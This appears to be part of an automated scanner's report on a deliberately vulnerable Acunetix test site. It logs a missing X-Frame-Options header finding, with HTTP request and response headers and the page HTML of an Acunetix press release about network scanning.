Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 22839
Response Body - size: 22,839 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKP1p3RBAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNw4dcQo8tH//aNq1Q9scKgXRi5G" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0&NewsAd=ads/def.html
Method	GET
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:03 GMT Content-Length: 22904
Response Body - size: 22,904 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGl